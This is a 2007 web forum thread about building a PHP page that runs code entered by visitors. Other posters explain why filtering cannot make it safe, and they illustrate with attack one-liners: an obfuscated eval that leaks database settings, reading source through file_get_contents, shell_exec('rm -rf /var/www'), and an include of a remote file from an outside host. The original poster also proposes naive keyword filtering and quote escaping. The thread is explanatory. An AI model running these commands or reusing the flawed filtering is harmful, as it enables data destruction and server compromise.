PHP Code Executer

Printable View

09-04-2007, 02:45 PM
fileserverdirect

PHP Code Executer

Hi,
I am making A "Test-It" php tester, where a code is provided in a textarea and the user can edit the code as they like and then a new, simple php page opens, like this:

PHP Code:

<?php //this is the page that executes whatever the user writes $code=$_POST['code'] some_function_to_execute_code($code); ?> <br>This is just a test document

I will also have to use the "eregi" function to see if they are trying to change my site from the inside, e.g. make chmod 777 and add stupid text to the index file or even delete something, or find out my Database info by typing "echo $dbhost;" or somthing. Is there a way?
09-04-2007, 03:22 PM
Twey

No. It's a Turing-complete language, there are too many possibilities. For example, you may be able to detect echo $dbhost;, but it's unlikely that you'd be able to detect:

Code:

$c1 = 'echo'; $c2 = 'd'; $c3 = 'h'; $c4 = 's'; $c5 = 'o'; $c6 = 't'; $c7 = 'b'; eval(implode(' ', array($c1, '$' . implode('', array($c2, $c7, $c3, $c5, $c4, $c6)))) . ';');
09-04-2007, 03:49 PM
fileserverdirect

Thanks, but I figured out A way around this, over every page with information there will be the folwing:

PHP Code:

<? define(IN_WEBSITE, "true); $ipaddr=$_SERVER['REMOTE_ADDRESS']; if(!isset(IN_WEBSITE) { echo "ERROR: You are trying to acess this page\\'s variables form an outside source, Your ip,<b>$ipaddr</b>, is sent to the webmaster, your ip may be banned"; mail("me@myemail", "Website Intruder", "The Intruder\'s ip: $ipaddr\r\nPage:$_SERVER['PHP_SELF']\\r\\nThanks, Your Website"); } else { //website } ?>

BTW: What I ment by "Is there a way?" is that Is there a way to execute code from a string?
P.S. I could always disable impload.
09-04-2007, 05:09 PM
Twey

Quote:

Thanks, but I figured out A way around this, over every page with information there will be the folwing:

All the attacker has to do is write define(IN_WEBSITE, true); and they're done. They can discover this information by reading the source of any page: print file_get_contents('index.php');
09-06-2007, 12:19 AM
fileserverdirect

Doesn't print file_get_contents('index.php'); only show the html of the document. If so than anyone could find out what google's or ebay's secert (if they were good enogh). besides, there's always encryption (which Is probally not Ideal for a constantly-updated site.
EDIT: I got the Idea for the try-it from W3 School's HTML Try-it thingey. That page is run by .asp so anyone could simply type in an asp code and boom. (I can't give an example because I don't know any asp).
09-06-2007, 12:30 AM
Twey

Quote:

Doesn't print file_get_contents('index.php'); only show the html of the document.

No, because it's accessing the file directly, not processing it as PHP.

Quote:

If so than anyone could find out what google's or ebay's secert (if they were good enogh).

Simple: they don't let people execute code on their servers.

Quote:

besides, there's always encryption (which Is probally not Ideal for a constantly-updated site.

Also not possible: if the code runs with the permissions of the process that's used to decrypt the code, the malicious user can access the key and decrypt the pages too.

Quote:

EDIT: I got the Idea for the try-it from W3 School's HTML Try-it thingey. That page is run by .asp so anyone could simply type in an asp code and boom.

It doesn't process ASP. The ASP examples are not editable.
09-07-2007, 12:00 AM
fileserverdirect

Well, you got me, I guess I won't have a try-it where the user can FULLY edit the code. Here is another what if,(you're problally tired of me by now) what if you could for example have a user type in (a single line one) in what they want to say, (this would be a basic HELLO WORLD Script) and the php script outputed the code to say hello world or whatever they inserted. It would not display a test document so people couldn't echo "" . $dbhost . "";, but just a block of code THEY can test. This is a fool-prof alternative.
09-07-2007, 02:37 AM
Twey

A single block of code like:

Code:

shell_exec('rm -rf /var/www');

perhaps?
09-07-2007, 02:11 PM
fileserverdirect

Well then I will just eregi for it and the echo will be enclosed in single quotes so no code can be exicuted and if they try to type a " ' . shell_exec('rm -rf /var/www') . ' " I will check for a single quote and place a "\" before it, and if they try to double slash, a slash will be takken off. If there is any more suggestions, please post.
09-07-2007, 02:18 PM
Twey

So you're now just echoing the input data directly rather than parsing it?
09-13-2007, 03:07 PM
fileserverdirect

Sorry for the late post (I was away from the computer for a while, long story).
-----
The echo that I mentchend was in the text box. So after the user clicked "Generate", a text box appeared containing:

PHP Code:

<textarea> <?\php //-------------------------------- //CODE GENERATED BY: so-and-so //Vist us at http://A-URL-HERE.com //You MAY remove this notice //-------------------------------- echo 'Some text that the user inputed above'; \?> </textarea>

NOTE: the slash before <?\php and \?> will disappear when echoed out by the main script and prevent the textarea from saying "Some text that the user inputed above"
I was origanly going to do this in javascript, but in case the user did not have JS installed on their computer... It would be alot cooler in php. I do not want to refresh the page, as soon as the user hits generate, boom, a text box appeard. I tryed some stuff like a whlie($user_submited="yes") etc. but it never worked, It ether sent it into and endless loop, or it didn't work, This could be a new thread, but it is still related to my problem.
09-13-2007, 04:00 PM
djr33

echo 'ha'.include('http://my.com/hackphp.txt')?'!';

Anyway, Twey is right.

As for what you're talking about now, the only way to make this work would be to write, from scratch, your own PHP parser. Wouldn't be impossible, but it would be complex, fast, as you started adding functions. Additionally, since you couldn't allow many things for security, it would be a waste, in some ways.

PHP is a server side language. The only way to make it work without refreshing using PHP is to use javascript to load the PHP data and display it (ie, Ajax), or you could use an iframe, etc.
09-13-2007, 07:01 PM
fileserverdirect

You are forgetting this post:

Quote:

Originally Posted by fileserverdirect

Well then I will just eregi for it and the echo will be enclosed in single quotes so no code can be exicuted and if they try to type a " ' . shell_exec('rm -rf /var/www') . ' " I will check for a single quote and place a "\" before it, and if they try to double slash, a slash will be takken off. If there is any more suggestions, please post.

Now my reply to a quote:

Quote:

PHP is a server side language. The only way to make it work without refreshing using PHP is to use javascript to load the PHP data and display it (ie, Ajax), or you could use an iframe, etc.

I like the IFRAME Idea but then I would have to give up my HTML 4.1 STRICT Status, unless I get tricky and use javascript to diplay it:cool: but that would be dishonest:( . Ah well, I will stick to javascript generating the code, and the people who don't have javascript, ah well, they will just have to deal with it:)
P.S. how do you highlight the code like you did above?
09-13-2007, 07:07 PM
djr33

I was just noting that there's a very simple one line way to hack that, even if you only allowed an echo statement. Using eregi replace would stop it, yes.

Quote:

the people who don't have javascript, ah well, they will just have to deal with it

Same if you were to use Ajax or a javascript generated iframe. And, anyone with iframes probably has javascript too (though it could be disabled).
09-13-2007, 08:45 PM
fileserverdirect

So what I was saying was right?
Also the Hello World script creater was just a simple example. I can get into more complex stuff, from if statements, to custom functions, to anything else php. Well I am going to go with the javascript version, mainly because it does not use frames or php, all client side, I guess is the safest:rolleyes:.
09-14-2007, 08:10 PM
djr33

PHP in this case would have no advantage either, as you will be rewriting a limited parser from scratch.